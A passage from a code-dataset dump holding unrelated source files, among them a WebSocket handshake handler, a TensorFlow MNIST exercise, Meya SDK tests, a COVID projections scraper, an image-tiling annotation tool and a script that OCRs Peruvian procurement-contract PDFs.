valid prefix. 
Ignore any that don't.\n for line in lines:\n if line[0] == '\\x00':\n valid_lines.append(line[1:])\n elif line == '':\n # The client wishes to terminate - send the closing handshake and disconnect\n self.close()\n # Return None so that the player object knows to log the player out\n return None\n else:\n self.log.error('Received invalid message from client '\n '(frame did not begin with 0x00 byte): %s' % (line))\n \n if valid_lines:\n return valid_lines\n \n return False\n \n \n def handshake(self):\n data = self.conn.recv(1024)\n host = re.findall(r'Host: (.*?)\\r\\n', data)[0]\n origin = re.findall(r'Origin: (.*?)\\r\\n', data)[0]\n response = self.handshake_string % {'origin': origin, 'host': host}\n \n response = response.encode('utf-8') + self.parse_hybi00(data)\n self.conn.send(response)\n \n def close(self):\n self.conn.close()\n \n def parse_hybi00(self, request):\n \"\"\" Parses an HTTP request header and forms a response according to\n The WebSocket protocol, draft-ietf-hybi-thewebsocketprotocol-00\n (http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-00).\n \"\"\"\n # The random tokens will be in the last 8 bytes of the request\n random_tokens = request[-8:]\n # Grab the sooper seekret keys hidden away in the request headers\n key1 = re.findall(r'Sec-WebSocket-Key1: (.*?)\\r\\n', request)[0]\n key2 = re.findall(r'Sec-WebSocket-Key2: (.*?)\\r\\n', request)[0]\n \n def parse_key(key):\n spaces = 0\n digits = ''\n \n for char in list(key):\n if char.isdigit():\n # If the character is a digit, concatonate it to our string of digits\n digits += char\n elif char == ' ':\n # If the character is a space, add it to our space counter orgecc\n spaces += 1\n \n result = int(int(digits) / spaces)\n return result\n \n \n response = pack('>II8s', parse_key(key1), parse_key(key2), str(random_tokens))\n hashed_response = hashlib.md5()\n hashed_response.update(response)\n return hashed_response.digest()\n \n\n","repo_name":"shinymud/ShinyMUD","sub_path":"src/shinymud/lib/connection_handlers/shiny_connections.py","file_name":"shiny_connections.py","file_ext":"py","file_size_in_byte":8417,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"61"}
+{"seq_id":"37862647361","text":"import asyncio\nfrom . import ghh\nfrom . import Server\n\n\nasync def on_game_state(message_nr, game_state):\n print(\"Got game state\", message_nr)\n\n\nasync def start_server():\n server = Server()\n server.on_game_state = on_game_state\n await server.serve_forever('0.0.0.0', 58888)\n print(\"Exiting\")\n\nif __name__ == \"__main__\":\n asyncio.run(start_server())\n","repo_name":"Gronis/gloomhaven-helper-rfid","sub_path":"python/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"61"}
+{"seq_id":"41649516317","text":"# 이전 파일 직접 실습한 것과 선생님이 만들어 준 것과 비교!\n\n# 텐서플로 1.14 부터 이미 케라스가 들어가 있어 keras 불러와서 쓸 수 있다.\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport tensorflow as tf \nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import OneHotEncoder\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.datasets import mnist\n\n# 데이터 지정 + 스케일링\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\n\nx_train = x_train.reshape(60000, 28*28).astype('float')/255.\nx_test = x_test.reshape(10000, 28*28).astype('float')/255.\n\nx = tf.placeholder('float', [None, 784])\ny = tf.placeholder('float', [None, 10])\nw = tf.Variable(tf.random_normal([784, 10]), name='weight')\nb = tf.Variable(tf.random_normal([1, 10]), name='bias')\n\n# 모델 구성\nhypothesis = tf.nn.softmax(tf.matmul(x, w) + b)\n\n# 컴파일 훈련(다중분류)\nloss = tf.reduce_mean(-tf.reduce_sum(y * tf.log(hypothesis), axis = 1))\ntrain = tf.train.GradientDescentOptimizer(learning_rate=1e-2).minimize(loss)\n\nwith tf.compat.v1.Session() as sess:\n sess.run(tf.compat.v1.global_variables_initializer())\n\n for epoch in range(2001):\n _, cur_loss = sess.run([train, loss], feed_dict = {x:x_train, y:y_train})\n if epoch%10 == 0:\n y_pred = sess.run(hypothesis, feed_dict = {x:x_test})\n y_pred = np.argmax(y_pred, axis = 1)\n print(f'Epoch {epoch} \\t===========>\\t loss : {cur_loss}')\n\n y_pred = sess.run(hypothesis, feed_dict = {x:x_test})\n y_pred = np.argmax(y_pred, axis = 1)\n\n print('accuracy score : ', accuracy_score(y_test, y_pred))\n\n","repo_name":"YoungriKIM/STUDY","sub_path":"tf114/tf16_mnist2.py","file_name":"tf16_mnist2.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"20375767051","text":"import pytest\n\nfrom meya.button.event.click import ButtonClickEvent\nfrom meya.component.entry.start import ComponentStartEntry\nfrom meya.core.type_registry import TypeRegistry\nfrom meya.element.element_error import ElementValidationError\nfrom meya.element.element_test import create_flow_start_entry\nfrom meya.element.element_test import create_trigger_action_entry\nfrom meya.element.element_test import test_type_registry\nfrom meya.element.element_test import verify_trigger_match\nfrom meya.event.entry import Event\nfrom meya.event.trigger.type import TypeTrigger\nfrom meya.text.component.say import SayComponent\nfrom meya.text.event.say import SayEvent\nfrom typing import Optional\n\n\n@pytest.mark.parametrize(\n (\"event_type\", \"validation_message\"),\n [\n (SayEvent.get_entry_type(test_type_registry), None),\n (\n SayComponent.get_element_type(test_type_registry),\n 'invalid event type \"meya.text.component.say\"',\n ),\n (\n ComponentStartEntry.get_entry_type(test_type_registry),\n 'invalid event type \"meya.component.entry.start\"',\n ),\n (\"foo\", 'invalid event type \"foo\"'),\n ],\n)\ndef test_validate_type(event_type: str, validation_message: Optional[str]):\n trigger = TypeTrigger(\n event_type=event_type,\n action=create_trigger_action_entry(create_flow_start_entry()),\n )\n with TypeRegistry.current.set(test_type_registry):\n if validation_message:\n with pytest.raises(ElementValidationError) as excinfo:\n trigger.validate()\n assert str(excinfo.value) == validation_message\n else:\n trigger.validate()\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\n (\"event_type\", \"event\", \"should_match\"),\n [\n (\n SayEvent.get_entry_type(test_type_registry),\n SayEvent(\n user_id=\"u-123\", text=\"t1\", thread_id=\"t-0\", trace_id=\"-\"\n ),\n True,\n ),\n (\n SayEvent.get_entry_type(test_type_registry),\n ButtonClickEvent(\n button_id=\"b-1\",\n text=\"Button\",\n thread_id=\"t-0\",\n user_id=\"u-123\",\n trace_id=\"-\",\n ),\n False,\n ),\n (\n ButtonClickEvent.get_entry_type(test_type_registry),\n SayEvent(\n user_id=\"u-123\", text=\"t1\", thread_id=\"t-0\", trace_id=\"-\"\n ),\n False,\n ),\n (\n ButtonClickEvent.get_entry_type(test_type_registry),\n ButtonClickEvent(\n button_id=\"b-1\",\n text=\"Button\",\n thread_id=\"t-0\",\n user_id=\"u-123\",\n trace_id=\"-\",\n ),\n True,\n ),\n ],\n)\nasync def test_type_trigger(event_type: str, event: Event, should_match: bool):\n trigger = TypeTrigger(\n event_type=event_type,\n action=create_trigger_action_entry(\n create_flow_start_entry(thread_id=event.thread_id)\n ),\n )\n match_data = {\n TypeTrigger.EVENT_KEY: event.to_typed_dict(test_type_registry)\n }\n await verify_trigger_match(\n trigger, event, should_match=should_match, match_data=match_data\n )\n","repo_name":"meya-customers/meya-sdk","sub_path":"meya/event/trigger/type_test.py","file_name":"type_test.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10572148067","text":"\"\"\"\nWrite a function:\n\ndef solution(A, B, K)\n\nthat, given three integers A, B and K, returns the number of integers within the range [A..B] that are divisible by K, i.e.:\n\n{ i : A ≤ i ≤ B, i mod K = 0 }\n\nFor example, for A = 6, B = 11 and K = 2, your function should return 3, because there are three numbers divisible by 2 within the range [6..11], namely 6, 8 and 10.\n\nWrite an efficient algorithm for the following assumptions:\n\nA and B are integers within the range [0..2,000,000,000];\nK is an integer within the range [1..2,000,000,000];\nA ≤ B\n\"\"\"\n\ndef solution_score_50(A, B, K):\n # write your code in Python 3.6\n divisible_count = 0\n for i in range(A, B + 1):\n if i % K == 0:\n divisible_count += 1\n return divisible_count\n\ndef solution_score_25(A, B, K):\n # write your code in Python 3.6\n divisible_count = 0\n while A <= B:\n if A % K == 0:\n divisible_count += 1\n A += K\n return divisible_count\n\ndef solution_score_100(A, B, K):\n # write your code in Python 3.6\n \"\"\"\n To get multiples of K from A - B.\n Get multiples of K in range B = B // K say kB\n get multiples of K before A: A - 1 // K asy kA\n return difference kB - kA. this gives the multiples of K from A to B\n \"\"\"\n return (B // K) - ((A - 1) // K)","repo_name":"shiram/learning-django-rest","sub_path":"interview_qns/countdiv.py","file_name":"countdiv.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74663737473","text":"import requests\nimport pandas as pd\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport io\n\ndef update_data(response,projection_date,name,log):\n df = pd.read_csv(io.StringIO(response.content.decode('utf-8')))\n\n del df['total_deaths']\n del df['predicted_total_deaths_mean']\n del df['predicted_total_deaths_lower']\n del df['predicted_total_deaths_upper']\n\n del df['predicted_total_infected_mean']\n del df['predicted_total_infected_lower']\n del df['predicted_total_infected_upper']\n\n del df['r_values_mean']\n del df['r_values_lower']\n del df['r_values_upper']\n\n\n\n for i, row in df.iterrows():\n \n date = row['date'].split('-')\n if date[1][0] == '0':\n date[1] = date[1][1]\n if date[2][0] == '0':\n date[2] = date[2][1]\n\n date = date[1] + '/' + date[2] + '/' + date[0]\n df.loc[i,'date'] = date\n\n #account for differences in reported deaths to correspond with the moving average displayed at covid19-projections.com\n if date == '6/25/2020':\n df.loc[i,'actual_deaths'] = 657\n elif date == '7/27/2020':\n df.loc[i,'actual_deaths'] = 483\n\n\n df.to_csv('covid_scraper/covid-projections.csv', index=False)\n\n log.write('({})\\t{}:\\t\\tAdding projections from {} to csv file...\\n'.format(name,dt.now(),str(projection_date).split(' ')[0]))\n\n\ndef scrape():\n name = 'C19-Proj. Scraper'\n log = open('log.txt','a')\n log.write('({})\\t{}:\\t\\tRunning script\\n'.format(name,dt.now()))\n\n url = \"https://raw.githubusercontent.com/youyanggu/covid19_projections/master/projections/{}/US.csv\" \n log.write('({})\\t{}:\\t\\tRequesting data...\\n'.format(name,dt.now()))\n\n date = dt.now()\n\n response = None\n try: \n response = requests.get(url.format(str(date)).split(' ')[0])\n\n while response.status_code !=200:\n date = date - timedelta( days=1)\n response = requests.get(url.format(str(date).split(' ')[0]))\n\n if response.status_code == 200:\n log.write('({})\\t{}:\\t\\tData received\\n'.format(name,dt.now()))\n\n log.write('({})\\t{}:\\t\\tUpdating csv file..\\n'.format(name,dt.now()))\n try:\n update_data(response,date, name, log)\n log.write('({})\\t{}:\\t\\tData written to csv\\n'.format(name,dt.now()))\n except:\n log.write('({})\\t{}:\\t\\tError writing data to csv\\n'.format(name,dt.now()))\n\n else:\n log.write('({})\\t{}:\\t\\tError retrieving data; Status code:{}\\n'.format(name,dt.now(), response.status_code))\n\n except:\n log.write('({})\\t{}:\\t\\tError retrieving data; Response failed\\n'.format(name,dt.now()))\n\n log.write('({})\\t{}:\\t\\tFinished script\\n'.format(name,dt.now()))\n log.close() \n\n\n","repo_name":"Andres-Carranza/Andres-Carranza.github.io","sub_path":"scripts/scrapers/covid_scraper/scrape_covid_projections.py","file_name":"scrape_covid_projections.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"29418320414","text":"def compare_string(string_1, string_2):\n if len(string_1) != len(string_2):\n return 'Not same';\n \n for i in range(len(string_1)):\n if string_1[i] != string_2[i]:\n return 'Not same';\n else:\n continue;\n return 'same';\n\nstr_1 = 'IncludeHelp.com';\nstr_2 = 'IncludeHelp.com';\nprint(compare_string(str_1,str_2));\n\n","repo_name":"rajibhasan01/Data_Structure_And_Algorithm","sub_path":"compare_string.py","file_name":"compare_string.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"29184634796","text":"import os\nimport shutil\nfrom PIL import Image\nimport ipywidgets as widgets\nfrom Modules import Q_UIparts\nfrom itertools import product\nfrom ipyfilechooser import FileChooser\nfrom Modules.Q_UniversalFunction import ValidImageType, ImageToLabel\n\n#Functie voor het opsnijden van foto's in segmenten\ndef FotoSegmentatie(ImageMap, Output, Size, Overlap):\n #Maakt een lijst van alle afbeeldingen met ondersteunde bestandstype in de fotomap\n docs = [file for file in os.listdir(ImageMap) if ValidImageType(file)]\n\n #Maakt een wachtscherm en een laadbalk om aan te geven hoever de code is.\n ProgressBar = widgets.IntProgress(\n value=0,\n max=len(docs),\n description=\"Progress:\",\n )\n WachtScherm = widgets.HTML(\n value=\"Foto's worden gesegmenteerd: \",\n )\n display(WachtScherm, ProgressBar)\n\n #gaat door alle afbeeldingen in de lijst\n for Files in docs:\n ProgressBar.value += 1\n\n #leest de foto is en checkt of deze verticaal georiënteerd staat. \n #Zonder deze stap kloppen de coördinaten in de naam niet en is het samenvoegen van annotaties voor een hele plaat onnodig moeilijk\n image = Image.open(os.path.join(ImageMap, Files))\n Width, Height = image.size\n if Width > Height:\n image = image.rotate(-90, expand=True)\n Width, Height = image.size\n\n #Is later nodig voor de nieuwe namen\n FileName, FileType = os.path.splitext(Files)\n\n #Berekent de hoek coördinaten voor alle toekomstige segmenten\n grid = product(\n range(0, Width, (Size - Overlap)), \n range(0, Height, (Size - Overlap)),\n )\n\n #segmenteerd de foto en slaat deze op onder het {project)/data/annotaties/{Data set}/images waarbij de naam bestaat uit naam van de complete foto + de coördinaten (in pixels, hoek rechts boven)\n for x, y in grid:\n box = (x, y, x + Size, y + Size)\n out = os.path.join(Output, f\"{FileName}_{y}_{x}{FileType}\")\n image.crop(box).save(out)\n image.close()\n\n ProgressBar.close()\n WachtScherm.close()\n\n#Functie voor het Verplaatsen van foto's volgens de data ordening \ndef FotoOrdening(ImageMap, OutputImage, LabelMap, OutputLabels):\n #Maakt een lijst van alle afbeeldingen met ondersteunde bestandstype in de fotomap\n docs = [file for file in os.listdir(ImageMap) if ValidImageType(file)]\n\n #Maakt een wachtscherm en een laadbalk om aan te geven hoever de code is.\n ProgressBar = widgets.IntProgress(\n value=0,\n max=len(docs),\n description=\"Progress:\",\n )\n WachtScherm = widgets.HTML(\n value=\"Foto's worden gekopieerd en geordend: \",\n )\n display(WachtScherm, ProgressBar)\n\n #Checkt of de aangegeven Label map de label vertalingen heeft en kopieert deze als ze bestaan.\n if LabelMap and os.path.exists(os.path.join(LabelMap, \"Labels.txt\")):\n shutil.copy2(os.path.join(LabelMap, \"Labels.txt\"), OutputLabels)\n\n #Gaat over de lijst van afbeeldingen en kopieert ze naar de nieuwe locatie, checkt tegelijkertijd of er in de label map een annotatie bestaat voor de desbetreffende afbeelding en kopieert deze mee als hij bestaat. 
\n for Files in docs:\n ProgressBar.value += 1\n shutil.copy2(os.path.join(ImageMap, Files), OutputImage)\n if LabelMap and os.path.exists(os.path.join(LabelMap, ImageToLabel(Files))):\n shutil.copy2(os.path.join(LabelMap, ImageToLabel(Files)), OutputLabels)\n \n\n ProgressBar.close()\n WachtScherm.close()\n\n#Deze functie maakt de interface van deze tool aan.\ndef FotoPreparatie():\n DataNaamTitel = widgets.HTML(value =\"Geef hier de naam voor de nieuwe dataset:\")\n\n ImagePickTitelSM = widgets.HTML(value = \"Selecteer hier de folder met foto's die gesegmenteerd gaan worden:\")\n ImagePickTitelOR = widgets.HTML(value = \"Selecteer hier de folder met foto's die gekopieerd en herordend gaan worden:\")\n LabelPickTitel = widgets.HTML(value = \"Niet verplicht! Selecteer hier de folder met bijbehorende annotaties als je deze hebt:\")\n\n SizeTitel = widgets.HTML(value = \"De foto's worden opgedeeld in vierkante segmenten met zijdes van \")\n Size = widgets.BoundedIntText(\n value=640,\n min=10,\n max=20000,\n step=1,\n disabled=False,\n layout = widgets.Layout(width = \"60px\")\n )\n\n OverlapTitel = widgets.HTML(value = \"de segmenten hebben een overlap met naast liggende segmenten van:\")\n OverlapNum = widgets.BoundedIntText(\n value=10,\n min=0,\n max=50,\n step=1,\n disabled=False,\n layout = widgets.Layout(width = \"60px\")\n )\n #Geeft een visuele indicatie hoeveel overlap op ieder segment zichtbaar is\n OverlapBar = widgets.IntRangeSlider(\n value=[10, 90],\n min=0,\n max=100,\n step=1,\n continuous_update=False,\n description=\"Overlap:\",\n orientation='horizontal',\n readout=False,\n layout=widgets.Layout(width=\"300px\", justify_content=\"flex-end\"),\n )\n\n #2 functies voor het linken van het percentage overlap en de visualisatie hiervan\n @OverlapNum.observe\n def linkOverlap(PlaceHolder):\n OverlapBar.value = [OverlapNum.value, (100-OverlapNum.value)]\n \n @OverlapBar.observe\n def linkOverlap2(PlaceHolder):\n if OverlapBar.value[0]!=OverlapNum.value:\n OverlapNum.value = OverlapBar.value[0]\n else:\n OverlapNum.value = -(OverlapBar.value[1]-100)\n\n pixels = widgets.HTML(\"pixels\")\n Procent = widgets.HTML(\"procent\")\n\n #Een tussentijdse samenvoeging van widgets voor een overzichtelijker geheel\n TileSize = widgets.VBox([\n widgets.HBox([\n SizeTitel, \n Size, \n pixels\n ]), \n widgets.HBox([\n OverlapTitel, \n OverlapNum, \n Procent\n ]),\n widgets.HBox([\n OverlapBar\n ], layout=widgets.Layout(width=\"400px\", justify_content=\"flex-end\")),\n \n ])\n\n Slice = widgets.Button(\n value=False,\n description=\"Slice\",\n button_style=\"success\",\n layout=widgets.Layout(width=\"80px\"),\n )\n\n Orden = widgets.Button(\n value=False,\n description=\"Orden\",\n button_style=\"success\",\n layout=widgets.Layout(width=\"80px\"),\n )\n \n #Functie voor het aanroepen en afronden van de functies voor het ordenen of segmenteren van foto's\n def run(Button):\n #Maakt een eindscherm voor het infomeren over de nieuwe folder locaties\n ImageLocation = os.path.join(Q_UIparts.ProjectPicker.value, f\"Data\\\\Annoteren\\\\{Q_UIparts.DataNaamInput.value}\\\\images\")\n LabelLocation = os.path.join(Q_UIparts.ProjectPicker.value, f\"Data\\\\Annoteren\\\\{Q_UIparts.DataNaamInput.value}\\\\labels\")\n SuccesScherm = widgets.HTML(\n value=f\"\"\"\n \n\n Succes! \n \n \n Foto's: \n {ImageLocation} \n \n \n Labels: \n {LabelLocation} \n \n \"\"\"\n )\n\n #If functie die probeert het ordenen/segmenteren te starten. 
Als dit niet lukt genereert het een ergercode naast de slice/orden knop.\n if Q_UIparts.ImagePick.selected and Q_UIparts.DataNaamInput.value and Q_UIparts.ProjectPicker.value and Button == \"Slice\":\n dirs_to_create = [ImageLocation, LabelLocation]\n for dir in dirs_to_create:\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n ViewCompleet.close()\n FotoSegmentatie(\n ImageMap=Q_UIparts.ImagePick.value,\n Output=ImageLocation,\n Size=int(Size.value),\n Overlap=int(Size.value * (OverlapNum.value / 100)),\n )\n display(SuccesScherm)\n \n elif Q_UIparts.ImagePick.selected and Q_UIparts.DataNaamInput.value and Q_UIparts.ProjectPicker.value and Button == \"Orden\":\n dirs_to_create = [ImageLocation, LabelLocation]\n for dir in dirs_to_create:\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n ViewCompleet.close()\n FotoOrdening(\n ImageMap=Q_UIparts.ImagePick.value,\n LabelMap=Q_UIparts.LabelPick.selected, \n OutputImage=ImageLocation,\n OutputLabels=LabelLocation\n )\n display(SuccesScherm)\n elif not Q_UIparts.ImagePick.selected:\n ErrorCode.value = \"\"\"\n \n Folder met foto's niet geselecteerd. Zorg ervoor dat je op select drukt na het kiezen van een folder om je selectie te bevestigen. \n
\n \"\"\"\n elif not Q_UIparts.ProjectPicker.value:\n ErrorCode.value = \"\"\"\n \n Er is geen Project geselecteerd. Zorg ervoor dat je op Maak drukt als je een nieuwe project wil maken/gebruiken. \n
\n \"\"\"\n else:\n ErrorCode.value = \"\"\"\n \n Er is geen naam opgegeven voor de nieuwe dataset. \n
\n \"\"\"\n \n #2 functies voor het aanropen van de functie hierboven. Dit is losgetrokken zodat een extra variabele meegegeven kan worden.\n @Slice.on_click\n def RunSlice(PlaceHolder):\n run(\"Slice\")\n\n @Orden.on_click\n def RunOrden(PlaceHolder):\n run(\"Orden\")\n\n #Voegt alle widgets samen tot een samenhangende Interface \n line = widgets.HTML(value=\" \")\n ErrorCode = widgets.HTML()\n\n Box1 = widgets.VBox([Q_UIparts.ProjectInterface, DataNaamTitel, Q_UIparts.DataNaamInput])\n Box2SM = widgets.VBox([ImagePickTitelSM, Q_UIparts.ImagePick, TileSize])\n Box2OR = widgets.VBox([ImagePickTitelOR, Q_UIparts.ImagePick, LabelPickTitel, Q_UIparts.LabelPick])\n\n ViewSM = widgets.VBox([\n widgets.HBox([\n Box1,\n Box2SM,\n ], layout=widgets.Layout(justify_content=\"space-around\")\n ),\n line,\n widgets.HBox([\n ErrorCode,\n Slice,\n ], layout=widgets.Layout(justify_content=\"flex-end\")\n )], layout=widgets.Layout(width=\"888px\")\n )\n\n ViewOR = widgets.VBox([\n widgets.HBox([\n Box1,\n Box2OR,\n ], layout=widgets.Layout(justify_content=\"space-around\")\n ),\n line,\n widgets.HBox([\n ErrorCode, \n Orden\n ], layout=widgets.Layout(justify_content=\"flex-end\")\n )], layout=widgets.Layout(width=\"888px\"),\n )\n\n ViewCompleet = widgets.Tab(layout= widgets.Layout(width='920px'))\n ViewCompleet.children = [ViewSM, ViewOR]\n ViewCompleet.titles = ('Foto segmentatie', 'Foto herordening')\n\n display(ViewCompleet)\n","repo_name":"FishingBehindTheNet/AiAssist-AnnotatieTool","sub_path":"Modules/A1_FotoPreparatie.py","file_name":"A1_FotoPreparatie.py","file_ext":"py","file_size_in_byte":11543,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40205349591","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 3 01:31:38 2021\r\n\r\n@author: tooru\r\n\"\"\"\r\n\r\n# Import libraries \r\nfrom PIL import Image \r\nimport pytesseract \r\nimport sys \r\nimport os\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\n\r\nfrom pdf2image import convert_from_path \r\nimport os \r\n\r\nimport urllib.request\r\n\r\nimport collections, re\r\nimport nltk\r\nfrom nltk.corpus import stopwords # Import the stop word list\r\n\r\nfrom datetime import datetime\r\nstartTime = datetime.now()\r\n \r\n# Path of packages \r\npop_path = r'...\\poppler-0.68.0\\bin' \r\n# Poppler = http://blog.alivate.com.au/poppler-windows/\r\npytesseract.pytesseract.tesseract_cmd = r'...\\tesseract.exe'\r\n# Pytesseract = https://github.com/UB-Mannheim/tesseract/wiki\r\n\r\npath = r'D:\\HatunData\\pdf_ocr'\r\n\r\npath_data = path + r'\\data\\\\' \r\npath_pdf = path + r'\\pdf\\\\' \r\npath_txt = path + r'\\text\\\\'\r\npath_tmp = path + r'\\temp\\\\'\r\n\r\n'''\r\n A. Maestros \r\n'''\r\n\r\nimport chardet\r\n\r\n#https://www.sunat.gob.pe/descargaPRR/mrc137_padron_reducido.html\r\nwith open(join(path_data,'padron_reducido_local_anexo.txt'), 'rb') as rawdata:\r\n encoding = chardet.detect(rawdata.read(10000)).get(\"encoding\")\r\nprint(encoding)\r\n\r\npadron_reducido = pd.read_csv(join(path_data,'padron_reducido_local_anexo.txt'), sep= '|', encoding='ISO-8859-1', dtype=object)\r\ntry: \r\n padron_reducido = padron_reducido[[' RUC','UBIGEO']]\r\nexcept:\r\n padron_reducido = padron_reducido[['RUC','UBIGEO']]\r\n\r\npadron_reducido.columns = ['RUC_PROVEEDOR', 'UBIGEO_PROVEEDOR']\r\npadron_reducido.sort_values(['RUC_PROVEEDOR', 'UBIGEO_PROVEEDOR'], inplace = True)\r\npadron_reducido = padron_reducido.drop_duplicates(subset = 'RUC_PROVEEDOR', keep='first')\r\n\r\nentidades = pd.read_excel(join(path_data,'CONOSCE_CONVOCATORIAS2021_0.xlsx'), skiprows=1)\r\nentidades = entidades[['CODIGOENTIDAD', 'ENTIDAD_RUC', 'ENTIDAD', 'TIPOENTIDAD','SECTOR']]\r\nentidades = entidades.drop_duplicates()\r\n\r\n'''\r\n X. PDF download from conosce-contratos url \r\n'''\r\n#http://bi.seace.gob.pe/pentaho/api/repos/:public:portal:datosabiertos.html/content?userid=public&password=key\r\ndf = pd.read_excel(join(path_data,'CONOSCE_CONTRATOS2021_0.xlsx'), skiprows=1)\r\ndf = df.rename(columns={'DOC_URL': 'URLCONTRATO'})\r\ndf['INDEX'] = df['URLCONTRATO'].str.replace('http://contratos.seace.gob.pe:9045/api/documentos/descargar/','')\r\n\r\nmerge_df = df\r\nmerge_df = pd.merge(merge_df, entidades, left_on='CODIGOENTIDAD' , right_on='CODIGOENTIDAD', how='left')\r\nmerge_df = pd.merge(merge_df, padron_reducido, left_on='RUC_CONTRATISTA' , right_on='RUC_PROVEEDOR', how='left')\r\n\r\nmerge_df.to_excel(join(path_data,'BDA_CONTRATOS_V4.xlsx') , index = False)\r\n\r\ndel merge_df\r\ndel padron_reducido\r\ndel entidades\r\n\r\n'''\r\n I. 
PDF download from conosce-contratos url \r\n'''\r\n\r\ndata_list = df['URLCONTRATO'].tolist()\r\ndel df\r\n\r\n\r\npdf_list = [join(path_pdf,i) for i in listdir(path_pdf)]\r\npdf_list = [w.replace('.pdf', '') for w in pdf_list]\r\npdf_list = [w.replace(path_pdf, 'http://contratos.seace.gob.pe:9045/api/documentos/descargar/') for w in pdf_list]\r\n\r\n#Lista de files que faltan descargar\r\ntodownload_list = set(data_list) - set(pdf_list)\r\ntodownload_list = list(todownload_list)\r\n\r\nprint(datetime.now() - startTime)\r\nprint('Start download')\r\n\r\na = 0\r\nfor i in todownload_list:\r\n a = a + 1\r\n print(a)\r\n pdf_name = i.rsplit('/', 1)[-1]\r\n print(i)\r\n try:\r\n urllib.request.urlretrieve(i, path_pdf + str(pdf_name) + '.pdf')\r\n print('download iter - ' + str(a) )\r\n print(path_pdf + str(pdf_name)+ '.pdf')\r\n except:\r\n print('failed download iter ' + str(a) + '- file - ' + str(pdf_name))\r\n \r\n print(datetime.now() - startTime)\r\n print('Corr of iter download - ' + str(a))\r\n\r\n\r\n'''\r\n II. PDF to JPG to TXT\r\n'''\r\n\r\nos.chdir(path_tmp)\r\n\r\npdf_list = [join(path_pdf,i) for i in listdir(path_pdf)]\r\npdf_list = [w.replace(path_pdf, '') for w in pdf_list]\r\npdf_list = [w.replace('.pdf', '') for w in pdf_list]\r\n\r\nparsed_list = [join(path_txt,i) for i in listdir(path_txt)]\r\nparsed_list = [w.replace(path_txt, '') for w in parsed_list]\r\nparsed_list = [w.replace('.txt', '') for w in parsed_list]\r\n\r\n#Lista de files que faltan parsear\r\ndiff_list = set(pdf_list) - set(parsed_list)\r\ndiff_list = list(diff_list)\r\n\r\nnum_file = 0\r\nfor file in diff_list:\r\n num_file = num_file + 1\r\n PDF_file = path_pdf + file + '.pdf'\r\n outfile = path_txt + file + '.txt' \r\n \r\n try:\r\n \r\n ''' \r\n Part #1 : Converting PDF to images \r\n '''\r\n \r\n # Store all the pages of the PDF in a variable \r\n pages = convert_from_path(PDF_file, 500, poppler_path = pop_path) \r\n \r\n # Counter to store images of each page of PDF to image \r\n image_counter = 1\r\n \r\n # Iterate through all the pages stored above \r\n for page in pages: \r\n \r\n # Declaring filename for each page of PDF as JPG \r\n filename = \"page_\"+str(image_counter)+\".jpg\"\r\n \r\n # Save the image of the page in system \r\n page.save(filename, 'JPEG') \r\n \r\n # Increment the counter to update filename \r\n image_counter = image_counter + 1\r\n \r\n print('success to JPG - ' + str(image_counter))\r\n\r\n ''' \r\n Part #2 - Recognizing text from the images using OCR \r\n '''\r\n \r\n # Variable to get count of total number of pages \r\n filelimit = image_counter-1\r\n \r\n # Open the file in append mode so that \r\n # All contents of all images are added to the same file \r\n f = open(outfile, \"a\") \r\n \r\n # Iterate from 1 to total number of pages \r\n for i in range(1, filelimit + 1): \r\n \r\n # Set filename to recognize text from \r\n filename = \"page_\"+str(i)+\".jpg\"\r\n \r\n # Recognize the text as string in image using pytesserct \r\n text = str(((pytesseract.image_to_string(Image.open(filename))))) \r\n \r\n text = text.replace('-\\n', '') \r\n \r\n # Finally, write the processed text to the file. \r\n f.write(text) \r\n print('success to tesseract')\r\n \r\n # Close the file after writing all the text. 
\r\n f.close() \r\n print('success conversion')\r\n except:\r\n print('failed conversion')\r\n \r\n \r\n print('######### Filename: ' + str(file))\r\n print('######### script time - iter ' + str(num_file))\r\n print(outfile)\r\n print(datetime.now() - startTime)\r\n \r\n\r\n\r\n'''\r\n III. TXT to structured dataframe\r\n'''\r\n\r\ntxt_list = [join(path_txt,i) for i in listdir(path_txt)]\r\ntxt_list = [w.replace(path_txt, '') for w in txt_list]\r\ntxt_list = [w.replace('.txt', '') for w in txt_list] \r\n \r\ndf_bow_append = pd.DataFrame()\r\n\r\nnum_file = 0\r\nfor file in txt_list:\r\n outfile = path_txt + file + '.txt' \r\n print(outfile)\r\n \r\n try:\r\n df = pd.read_fwf(outfile, dtype=object, header=None)\r\n list_columns = df.columns\r\n df['file_name'] = file \r\n df['columna_unica'] = ''\r\n for i in list_columns:\r\n print(i)\r\n df['columna_unica'] = df['columna_unica'].fillna('') + ' ' + df[i].fillna('')\r\n \r\n df['columna_unica'] = df['columna_unica'].str.upper()\r\n df['columna_unica'] = 